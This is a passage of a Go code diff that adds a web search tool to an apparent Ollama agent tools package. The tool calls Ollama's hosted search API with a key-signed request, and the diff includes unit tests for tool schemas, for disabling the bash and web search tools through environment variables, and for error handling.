+	_, ok = r.Get("bash")
+	if ok {
+		t.Error("expected bash to be disabled")
+	}
+}
+
+func TestDefaultRegistry_DisableBoth(t *testing.T) {
+	t.Setenv("OLLAMA_AGENT_DISABLE_WEBSEARCH", "1")
+	t.Setenv("OLLAMA_AGENT_DISABLE_BASH", "1")
+
+	r := DefaultRegistry()
+
+	if r.Count() != 0 {
+		t.Errorf("expected 0 tools with both disabled, got %d", r.Count())
+	}
+}
+
+func TestBashTool_Schema(t *testing.T) {
+	tool := &BashTool{}
+
+	schema := tool.Schema()
+	if schema.Name != "bash" {
+		t.Errorf("expected name 'bash', got '%s'", schema.Name)
+	}
+
+	if schema.Parameters.Type != "object" {
+		t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
+	}
+
+	if _, ok := schema.Parameters.Properties.Get("command"); !ok {
+		t.Error("expected 'command' property in schema")
+	}
+}
+
+func TestWebSearchTool_Schema(t *testing.T) {
+	tool := &WebSearchTool{}
+
+	schema := tool.Schema()
+	if schema.Name != "web_search" {
+		t.Errorf("expected name 'web_search', got '%s'", schema.Name)
+	}
+
+	if schema.Parameters.Type != "object" {
+		t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
+	}
+
+	if _, ok := schema.Parameters.Properties.Get("query"); !ok {
+		t.Error("expected 'query' property in schema")
+	}
+}

x/tools/websearch.go

@@ -0,0 +1,175 @@
+package tools
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"net/http"
+	"net/url"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/ollama/ollama/api"
+	"github.com/ollama/ollama/auth"
+)
+
+const (
+	webSearchAPI     = "https://ollama.com/api/web_search"
+	webSearchTimeout = 15 * time.Second
+)
+
+// ErrWebSearchAuthRequired is returned when web search requires authentication
+var ErrWebSearchAuthRequired = errors.New("web search requires authentication")
+
+// WebSearchTool implements web search using Ollama's hosted API.
+type WebSearchTool struct{}
+
+// Name returns the tool name.
+func (w *WebSearchTool) Name() string {
+	return "web_search"
+}
+
+// Description returns a description of the tool.
+func (w *WebSearchTool) Description() string {
+	return "Search the web for current information. Use this when you need up-to-date information that may not be in your training data."
+}
+
+// Schema returns the tool's parameter schema.
+func (w *WebSearchTool) Schema() api.ToolFunction {
+	props := api.NewToolPropertiesMap()
+	props.Set("query", api.ToolProperty{
+		Type:        api.PropertyType{"string"},
+		Description: "The search query to look up on the web",
+	})
+	return api.ToolFunction{
+		Name:        w.Name(),
+		Description: w.Description(),
+		Parameters: api.ToolFunctionParameters{
+			Type:       "object",
+			Properties: props,
+			Required:   []string{"query"},
+		},
+	}
+}
+
+// webSearchRequest is the request body for the web search API.
+type webSearchRequest struct {
+	Query      string `json:"query"`
+	MaxResults int    `json:"max_results,omitempty"`
+}
+
+// webSearchResponse is the response from the web search API.
+type webSearchResponse struct {
+	Results []webSearchResult `json:"results"`
+}
+
+// webSearchResult is a single search result.
+type webSearchResult struct {
+	Title   string `json:"title"`
+	URL     string `json:"url"`
+	Content string `json:"content"`
+}
+
+// Execute performs the web search.
+// Uses Ollama key signing for authentication - this makes requests via ollama.com API.
+func (w *WebSearchTool) Execute(args map[string]any) (string, error) {
+	query, ok := args["query"].(string)
+	if !ok || query == "" {
+		return "", fmt.Errorf("query parameter is required")
+	}
+
+	// Prepare request
+	reqBody := webSearchRequest{
+		Query:      query,
+		MaxResults: 5,
+	}
+
+	jsonBody, err := json.Marshal(reqBody)
+	if err != nil {
+		return "", fmt.Errorf("marshaling request: %w", err)
+	}
+
+	// Parse URL and add timestamp for signing
+	searchURL, err := url.Parse(webSearchAPI)
+	if err != nil {
+		return "", fmt.Errorf("parsing search URL: %w", err)
+	}
+
+	q := searchURL.Query()
+	q.Add("ts", strconv.FormatInt(time.Now().Unix(), 10))
+	searchURL.RawQuery = q.Encode()
+
+	// Sign the request using Ollama key (~/.ollama/id_ed25519)
+	// This authenticates with ollama.com using the local signing key
+	ctx := context.Background()
+	data := fmt.Appendf(nil, "%s,%s", http.MethodPost, searchURL.RequestURI())
+	signature, err := auth.Sign(ctx, data)
+	if err != nil {
+		return "", fmt.Errorf("signing request: %w", err)
+	}
+
+	req, err := http.NewRequestWithContext(ctx, http.MethodPost, searchURL.String(), bytes.NewBuffer(jsonBody))
+	if err != nil {
+		return "", fmt.Errorf("creating request: %w", err)
+	}
+
+	req.Header.Set("Content-Type", "application/json")
+	if signature != "" {
+		req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", signature))
+	}
+
+	// Send request
+	client := &http.Client{Timeout: webSearchTimeout}
+	resp, err := client.Do(req)
+	if err != nil {
+		return "", fmt.Errorf("sending request: %w", err)
+	}
+	defer resp.Body.Close()
+
+	body, err := io.ReadAll(resp.Body)
+	if err != nil {
+		return "", fmt.Errorf("reading response: %w", err)
+	}
+
+	if resp.StatusCode == http.StatusUnauthorized {
+		return "", ErrWebSearchAuthRequired
+	}
+	if resp.StatusCode != http.StatusOK {
+		return "", fmt.Errorf("web search API returned status %d: %s", resp.StatusCode, string(body))
+	}
+
+	// Parse response
+	var searchResp webSearchResponse
+	if err := json.Unmarshal(body, &searchResp); err != nil {
+		return "", fmt.Errorf("parsing response: %w", err)
+	}
+
+	// Format results
+	if len(searchResp.Results) == 0 {
+		return "No results found for query: " + query, nil
+	}
+
+	var sb strings.Builder
+	sb.WriteString(fmt.Sprintf("Search results for: %s\n\n", query))
+
+	for i, result := range searchResp.Results {
+		sb.WriteString(fmt.Sprintf("%d. %s\n", i+1, result.Title))
+		sb.WriteString(fmt.Sprintf("   URL: %s\n", result.URL))
+		if result.Content != "" {
+			// Truncate long content (UTF-8 safe)
+			content := result.Content
+			runes := []rune(content)
+			if len(runes) > 300 {
+				content = string(runes[:300]) + "..."
+			}
+			sb.WriteString(fmt.Sprintf("   %s\n", content))
+		}
+		sb.WriteString("\n")
+	}
+
+	return sb.String(), nil
+}

x/tools/websearch_test.go

@@ -0,0 +1,58 @@
+package tools
+
+import (
+	"errors"
+	"testing"
+)
+
+func TestWebSearchTool_Name(t *testing.T) {
+	tool := &WebSearchTool{}
+	if tool.Name() != "web_search" {
+		t.Errorf("expected name 'web_search', got '%s'", tool.Name())
+	}
+}
+
+func TestWebSearchTool_Description(t *testing.T) {
+	tool := &WebSearchTool{}
+	if tool.Description() == "" {
+		t.Error("expected non-empty description")
+	}
+}
+
+func TestWebSearchTool_Execute_MissingQuery(t *testing.T) {
+	tool := &WebSearchTool{}
+
+	// Test with no query
+	_, err := tool.Execute(map[string]any{})
+	if err == nil {
+		t.Error("expected error for missing query")
+	}
+
+	// Test with empty query
+	_, err = tool.Execute(map[string]any{"query": ""})
+	if err == nil {
+		t.Error("expected error for empty query")
+	}
+}
+
+func TestErrWebSearchAuthRequired(t *testing.T) {
+	// Test that the error type exists and can be checked with errors.Is
+	err := ErrWebSearchAuthRequired
+	if err == nil {
+		t.Fatal("ErrWebSearchAuthRequired should not be nil")
+	}
+
+	if err.Error() != "web search requires authentication" {
+		t.Errorf("unexpected error message: %s", err.Error())
+	}
+
+	// Test that errors.Is works
+	wrappedErr := errors.New("wrapped: " + err.Error())
+	if errors.Is(wrappedErr, ErrWebSearchAuthRequired) {
+		t.Error("wrapped error should not match with errors.Is")
+	}
+
+	if !errors.Is(ErrWebSearchAuthRequired, ErrWebSearchAuthRequired) {
+		t.Error("ErrWebSearchAuthRequired should match itself with errors.Is")
+	}
+}